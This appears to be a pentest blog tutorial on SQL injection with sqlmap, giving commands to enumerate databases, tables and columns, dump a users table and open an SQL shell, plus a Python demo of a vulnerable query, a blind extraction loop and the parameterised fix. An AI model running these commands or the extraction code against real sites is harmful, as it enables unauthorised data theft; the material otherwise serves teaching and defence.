SQL Injection
Using sqlmap
Hello everyone. Today I am going to walk through exploiting SQL injection, one of the most critical web vulnerabilities: we will retrieve data from the back-end database and then get an SQL shell on it.
Before getting into the attack scenario, let's cover the basics: what is SQL injection?
What is SQL injection?
You are probably already aware of it, but here is a quick recap.
SQL injection, also known as SQLi, is a code injection technique in which an attacker gets the application to execute SQL it never intended to run, by sending input that the application concatenates straight into a database query. With the right set of queries the attacker can read, and often modify, the information stored in the database. sqlmap automates testing whether the parameters of a request (GET and POST parameters, cookies and other HTTP headers) are injectable.
It is one of the most critical and dangerous web attacks. Injection has appeared in every edition of the OWASP Top 10: it topped the list in 2013 and 2017 and still sits at A03 in the 2021 edition.
sqlmap is an open-source penetration testing tool that ships preinstalled with Kali Linux. It automates detecting and exploiting SQL injection flaws and extracting data from the back-end database: fingerprinting the DBMS, enumerating databases, tables and columns, dumping rows and, where the injection allows it, running SQL statements interactively.
Attack Scenario
During a recent pentest I came across an SQL injection, which was further exploited using the sqlmap tool.
SQLMAP
First, open a terminal on Kali Linux; sqlmap is already installed.
We start by looking for the databases behind the application. Simply run:
sqlmap -u "TARGETURL" --dbs
With the above command we were not able to detect it, but with the level and risk options we were able to detect the database. Now you might be confused about what level and risk are...
Sometimes sqlmap cannot find the injection with its default settings. That is where --level and --risk come in: they make sqlmap test more parts of the request and send more, and more aggressive, payloads.
(--risk controls how risky the payloads are. The default is 1 and the maximum is 3. Risk 2 adds heavy-query time-based payloads; risk 3 adds OR-based boolean payloads, which can alter data if the injection point sits inside an UPDATE or DELETE statement, so use it with care on a production system.)
(--level controls how many checks/payloads are performed and which parts of the request are tested. It ranges from 1, the default, to 5. From level 2 sqlmap also tests HTTP cookie values, from level 3 the User-Agent and Referer headers, and level 5 uses the largest set of payloads and boundaries, so scans take noticeably longer.)
So our modified command becomes:
sudo sqlmap -u "TARGETURL" --dbs --risk=3 --level=4
You can see below that we have successfully detected the database.
After detecting it, we select that database with -D and list the tables it contains:
sudo sqlmap -u "TARGETURL" --risk=3 --level=4 -D "DATABASENAME" --tables
Oh!!! You can see there are several tables in the database.
To list the columns of the users table, we run:
sudo sqlmap -u "TARGETURL" --risk=3 --level=4 -D "DATABASENAME" -T users --columns
Yes, we got the columns of the table.
Now that we know the database name, the tables and their columns, we dump the data. -C limits the dump to the named column(s); leave it out to dump the whole table:
sqlmap -u "TARGETURL" --risk=3 --level=4 -D "DATABASENAME" -T users -C emai-id --dump
Now let's try to get SQL shell access. The shell runs every statement through the same injection point, so SELECT statements work with any detected technique, but anything other than SELECT needs stacked queries to be supported. To open it, run:
sqlmap -u "TARGETURL" --risk=2 --level=4 --sql-shell
BOOM!!! We got shell access. Since we already know the table and column names from the earlier steps, we can query them directly.
We can run a query to retrieve the data:
select * from users
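To make concrete what sqlmap is doing behind those flags, here is an added example that is not from the original post or from the sqlmap project: a lookup that concatenates a GET parameter into its query, the boolean-based blind extraction loop sqlmap would run against it (the equivalents of --tables and --dump above), and the parameterised query that closes the hole. The in-memory SQLite database, its rows, and the users/email_id names are constructed for the demo and are assumptions, not details of the target in the write-up.

```python
"""Added example (not from the original post): what sqlmap automates, in miniature.

A lookup that concatenates a GET parameter into SQL, a boolean-based blind
extraction loop run against it, and the parameterised version that stops it.
Everything runs against an in-memory SQLite database with constructed rows;
the table and column names (users, email_id) are assumptions for the demo.
"""
import sqlite3


def make_db():
    """Constructed sample data standing in for the target's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email_id TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test');
        INSERT INTO users VALUES (2, 'bob',   'bob@example.test');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    """The flaw: the request parameter is pasted straight into the query.
    Returns True/False, mirroring a page that renders a profile or 'not found'."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn, user_id):
    """The fix: a bound parameter is data, never SQL, whatever it contains."""
    sql = "SELECT username FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchone() is not None


def blind_extract(conn, expr, max_len=64):
    """Recover the value of an SQL expression one character at a time using
    only true/false responses: sqlmap's boolean-based blind technique.
    ASCII is assumed; each character costs about seven requests (binary
    search over code points 0..127)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce(..., 0) maps "past the end of the string" to code point 0
            cond = f"coalesce(unicode(substr(({expr}),{pos},1)),0) > {mid}"
            if lookup_vulnerable(conn, f"1 AND {cond}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # no character at this position: the string is complete
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    # The first two probes sqlmap sends: an always-true and an always-false condition.
    print(lookup_vulnerable(db, "1 AND 1=1"), lookup_vulnerable(db, "1 AND 1=2"))  # True False
    # --tables equivalent: SQLite keeps its catalogue in sqlite_master
    # (information_schema on MySQL and PostgreSQL).
    print(blind_extract(db, "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"))  # users
    # --dump equivalent for one column of one row.
    print(blind_extract(db, "SELECT email_id FROM users WHERE id=1"))  # alice@example.test
    # The same payload against the parameterised lookup is just a non-matching id.
    print(lookup_safe(db, "1"), lookup_safe(db, "1 AND 1=1"))  # True False
```

Run it as a script to watch the probes. Pulling an 18-character e-mail address this way takes well over a hundred requests, which is why a --level=4 scan is slow and why boolean- and time-based extraction stands out so clearly in web server logs. On MySQL or PostgreSQL sqlmap reads the same catalogue information from information_schema instead of sqlite_master.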
Thank you all for spending your precious time reading this article.
Stay tuned for the next attack.